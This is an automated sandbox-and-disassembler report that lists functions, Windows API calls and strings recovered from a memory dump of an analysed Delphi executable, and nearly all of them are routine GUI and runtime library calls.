Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043EBD8, Relevance: 10.7, APIs: 7, Instructions: 151

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010), ref: 0043ECBD
GetTickCount.KERNEL32(00000000,000000FF,?,?,?,?,00000010,00000000,0043ED9F), ref: 0043ECC2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043ECFD
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043ED15

Part of subcall function 00441E2C: GetCursorPos.USER32(?), ref: 00441E30

AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043ED5B
ShowWindow.USER32(00000000,00000004), ref: 0043ED6C
GetTickCount.KERNEL32(0043EDA6), ref: 0043ED86

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00454B30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125

APIs

GetKeyboardLayoutList.USER32(00000040,?), ref: 00454B86
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00454BEE
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00454C97,?,80000002,00000000), ref: 00454C28
RegCloseKey.ADVAPI32(?,00454C9E,00000000,?,00000100,00000000,00454C97,?,80000002,00000000), ref: 00454C91

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00454BD8
layout text, xrefs: 00454C1F

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00422B38, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00422B8A
MulDiv.KERNEL32(?,?,000009EC,?), ref: 00422BA1
GetDC.USER32(00000000), ref: 00422BB8
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?), ref: 00422BDC
GetWinMetaFileBits.GDI32(?,?,?,00000008,?), ref: 00422C0F

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Strings

`, xrefs: 00422B70

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00454E70, Relevance: 10.6, APIs: 7, Instructions: 89

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454EC4
CreateFontIndirectA.GDI32(?), ref: 00454ED1
GetStockObject.GDI32(0000000D), ref: 00454EE7
SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454F10
CreateFontIndirectA.GDI32(?), ref: 00454F20
CreateFontIndirectA.GDI32(?), ref: 00454F39

Part of subcall function 0041ED3C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041ED49

GetStockObject.GDI32(0000000D), ref: 00454F5F

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043EEE4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73

APIs

6D37908C.COMCTL32(00000000), ref: 0043EF16

Part of subcall function 004262C8: 6D3D6ED3.COMCTL32(*PC,000000FF,00000000,0043EF46,00000000,0043EFA4,?,00000000), ref: 004262CC

6D3D6C74.COMCTL32(*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF6A
6D3D6CC8.COMCTL32(00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF75
6D3D6C74.COMCTL32(*PC,00000001,?,0043F00D,00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF88
6D377CF1.COMCTL32(*PC,0043EFAB,0043F00D,00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF9E

Strings

*PC, xrefs: 0043EF3E, 0043EF58, 0043EF66, 0043EF84, 0043EF9A, 0043EF69, 0043EF87, 0043EF9D

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00426790, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004267E8
GetSystemMetrics.USER32(00000000), ref: 004267FD
GetSystemMetrics.USER32(00000001), ref: 00426808
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426832

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

DISPLAY, xrefs: 00426829
GetMonitorInfoA, xrefs: 004267A8

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004231BC, Relevance: 10.6, APIs: 7, Instructions: 66

APIs

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042060E

GetDC.USER32(00000000), ref: 004231FA
CreateCompatibleDC.GDI32(?), ref: 00423206
SelectObject.GDI32(?), ref: 00423213
SetDIBColorTable.GDI32(?,00000000,00000000,?), ref: 00423237
SelectObject.GDI32(?,?), ref: 00423251
DeleteDC.GDI32(?), ref: 0042325A
ReleaseDC.USER32(00000000,?), ref: 00423265

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00454DE0, Relevance: 10.6, APIs: 7, Instructions: 57

APIs

GetCursorPos.USER32 ref: 00454DFB
WindowFromPoint.USER32(?,?), ref: 00454E08
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454E16
GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00454E1D
SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00454E36
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00454E4D
SetCursor.USER32(00000000), ref: 00454E5F

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004505E8, Relevance: 9.3, APIs: 6, Instructions: 284

APIs

SetFocus.USER32(00000000), ref: 004506A3

Part of subcall function 00450E48: SendMessageA.USER32(00000000,00000229,00000000,00000000), ref: 00450E6F

Part of subcall function 0041F3B8: RtlInitializeCriticalSection.KERNEL32(00422DBC,00422D84,?,00000001,00422F1A,?,?,?,00424185,?,?,00423FA5,?,0000000E,00000000,?), ref: 0041F3D8

SaveDC.GDI32(?), ref: 004507CA
RestoreDC.GDI32(?,?), ref: 0045083B
GetWindowDC.USER32(00000000), ref: 004508A7
SaveDC.GDI32(?), ref: 004508DE
RestoreDC.GDI32(?,?), ref: 00450942

Part of subcall function 0043B13C: DefWindowProcA.USER32(00000000,?,?,?), ref: 0043B243
Part of subcall function 0043B13C: GetCapture.USER32 ref: 0043B260

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0040C14C, Relevance: 9.1, APIs: 6, Instructions: 139

APIs

767E48F1.OLEAUT32(?), ref: 0040C17C
767EFFDA.OLEAUT32(?,00000001,?), ref: 0040C1E1
767EFF8E.OLEAUT32(?,00000001,?,?,00000001,?), ref: 0040C203
767F00CA.OLEAUT32(0000000C,?,?), ref: 0040C242

Part of subcall function 0040C00C: 767E3EAE.OLEAUT32(?,00000100,?,?,0040C9DE), ref: 0040C05B

767F0035.OLEAUT32(?,?,?,0000000C,?,?), ref: 0040C2AD
767F0035.OLEAUT32(00000000,?,?,?,?,?,0000000C,?,?), ref: 0040C2CC

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00420880, Relevance: 9.1, APIs: 6, Instructions: 84

APIs

GetSystemMetrics.USER32(0000000B), ref: 004208CE
GetSystemMetrics.USER32(0000000C), ref: 004208DA
GetDC.USER32(00000000), ref: 004208F6
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042091D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042092A
ReleaseDC.USER32(00000000,00000000), ref: 00420963

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00420CF0, Relevance: 9.1, APIs: 6, Instructions: 65

APIs

Part of subcall function 00420BA0: GetObjectA.GDI32(?,00000054), ref: 00420BB4

CreateCompatibleDC.GDI32(00000000), ref: 00420D12
SelectPalette.GDI32(?,?,00000000), ref: 00420D33
RealizePalette.GDI32(?), ref: 00420D3F
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00420D56
SelectPalette.GDI32(?,00000000,00000000), ref: 00420D7E
DeleteDC.GDI32(?), ref: 00420D87

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00433DBC, Relevance: 9.1, APIs: 6, Instructions: 60

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00433DE4
GetWindowLongA.USER32(?,000000F0), ref: 00433DEF
GetWindowLongA.USER32(?,000000F4), ref: 00433E01
SetWindowLongA.USER32(?,000000F4,?), ref: 00433E14
SetPropA.USER32(?,00000000,00000000), ref: 00433E2B
SetPropA.USER32(?,00000000,00000000), ref: 00433E42

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00425E92, Relevance: 9.1, APIs: 6, Instructions: 58

APIs

Part of subcall function 00425998: GetDC.USER32(00000000), ref: 0042599B
Part of subcall function 00425998: GetDeviceCaps.GDI32(00000000,0000005A), ref: 004259A5
Part of subcall function 00425998: ReleaseDC.USER32(00000000,00000000), ref: 004259B2

RtlInitializeCriticalSection.KERNEL32(00464A44), ref: 00425EAB
RtlInitializeCriticalSection.KERNEL32(00464A5C,00464A44), ref: 00425EB5
GetStockObject.GDI32(00000007), ref: 00425EBC
GetStockObject.GDI32(00000005), ref: 00425EC8
GetStockObject.GDI32(0000000D), ref: 00425ED4
LoadIconA.USER32(00000000,00007F00), ref: 00425EE5

Part of subcall function 00425A14: MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21
Part of subcall function 00425A14: MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Part of subcall function 0041DDD4: RtlInitializeCriticalSection.KERNEL32(?), ref: 0041DDEE

Part of subcall function 00425AE0: RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6

Part of subcall function 00413F7C: RtlInitializeCriticalSection.KERNEL32(0041177C,?,?,00442409,00000000,00000000,?,?,00000000,004424B0), ref: 00413F9B

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00420530, Relevance: 9.1, APIs: 6, Instructions: 55

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00420549
SelectObject.GDI32(00000000,00000000), ref: 00420552
GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
SelectObject.GDI32(00000000,00000000), ref: 00420572
DeleteDC.GDI32(00000000), ref: 00420578
CreatePalette.GDI32 ref: 004205BE

Part of subcall function 00420498: GetDC.USER32(00000000), ref: 004204B0
Part of subcall function 00420498: GetDeviceCaps.GDI32(?,00000068), ref: 004204CC
Part of subcall function 00420498: GetPaletteEntries.GDI32(02080848,00000000,00000008,?), ref: 004204E4
Part of subcall function 00420498: GetPaletteEntries.GDI32(02080848,00000008,00000008,?), ref: 004204FC
Part of subcall function 00420498: ReleaseDC.USER32(00000000,?), ref: 00420518

Part of subcall function 00420328: GetSystemInfo.KERNEL32(?), ref: 00420338

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0041FC14, Relevance: 9.0, APIs: 6, Instructions: 43

APIs

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

UnrealizeObject.GDI32(00000000), ref: 0041FC20
SelectObject.GDI32(?,00000000), ref: 0041FC32
SetBkColor.GDI32(?,00000000), ref: 0041FC55
SetBkMode.GDI32(?,00000002), ref: 0041FC60

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

SetBkColor.GDI32(?,00000000), ref: 0041FC7B
SetBkMode.GDI32(?,00000001), ref: 0041FC86

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00457AFC, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 289

APIs

ClientToScreen.USER32(?,?), ref: 00457C28
OffsetRect.USER32(?,?,?), ref: 00457C3F
OffsetRect.USER32(?,?,?), ref: 00457D6F

Part of subcall function 00455610: GetCurrentThreadId.KERNEL32 ref: 00455628
Part of subcall function 00455610: SetWindowsHookExA.USER32(00000003,004555CC,00000000,00000000), ref: 00455638
Part of subcall function 00455610: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00455653
Part of subcall function 00455610: CreateThread.KERNEL32(00000000,000003E8,00455570,00000000,00000000), ref: 00455677

Part of subcall function 00457718: SetTimer.USER32(00000000,00000000,?,0045551C), ref: 00457732

Part of subcall function 0044DF58: GetActiveWindow.USER32 ref: 0044DF5B
Part of subcall function 0044DF58: GetCurrentThreadId.KERNEL32(0044DF38), ref: 0044DF70
Part of subcall function 0044DF58: EnumThreadWindows.USER32(00000000,0044DF38), ref: 0044DF76

Part of subcall function 00457948: GetCursor.USER32 ref: 00457963
Part of subcall function 00457948: GetIconInfo.USER32(00000000,?), ref: 00457969

Strings

41C, xrefs: 00457C05
|7C, xrefs: 00457CA5

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043A714, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetClassInfoA.USER32(?,?,?), ref: 0043A7D8
UnregisterClassA.USER32(?,?), ref: 0043A800
RegisterClassA.USER32(?), ref: 0043A816

Part of subcall function 0043D99C: IsIconic.USER32(?), ref: 0043D9AB
Part of subcall function 0043D99C: GetWindowPlacement.USER32(?,0000002C), ref: 0043D9C8
Part of subcall function 0043D99C: GetWindowRect.USER32(?), ref: 0043D9E1
Part of subcall function 0043D99C: GetWindowLongA.USER32(?,000000F0), ref: 0043D9EF
Part of subcall function 0043D99C: GetWindowLongA.USER32(?,000000F8), ref: 0043DA04
Part of subcall function 0043D99C: ScreenToClient.USER32(00000000), ref: 0043DA11
Part of subcall function 0043D99C: ScreenToClient.USER32(00000000,?), ref: 0043DA1C

Part of subcall function 0041EAB0: CreateFontIndirectA.GDI32(?), ref: 0041EBEE

Part of subcall function 0040B04C: GetLastError.KERNEL32(00000000,0040B0DC), ref: 0040B066

Strings

41C, xrefs: 0043A765
@, xrefs: 0043A74D

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0040A328, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A4E3), ref: 0040A393
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A4E3), ref: 0040A3B5

Strings

4s@, xrefs: 0040A494
s@, xrefs: 0040A438
t|@, xrefs: 0040A44A, 0040A4A6

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00409CD8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

Strings

Ts@, xrefs: 00409DB6

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00409CD6, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409CF5
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409D19
GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409D34
LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 00409DCA

Strings

Ts@, xrefs: 00409DB6

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00403340, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403362
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403395
RegCloseKey.ADVAPI32(?,004033B8,00000000,?,00000004,00000000,004033B1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004033AB

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 00403358
FPUMaskValue, xrefs: 0040338C

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0044FD30, Relevance: 7.7, APIs: 5, Instructions: 171

APIs

MulDiv.KERNEL32(00000000,?,00000000), ref: 0044FDEF
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FE6B
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FE9A
MulDiv.KERNEL32(?,00000000,00000000), ref: 0044FEC9
MulDiv.KERNEL32(?,00000000,00000000,?), ref: 0044FEEC

Part of subcall function 0044F298: MulDiv.KERNEL32(?,00000001,00000001), ref: 0044F2F5
Part of subcall function 0044F298: MulDiv.KERNEL32(?,00000001,00000001), ref: 0044F315

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

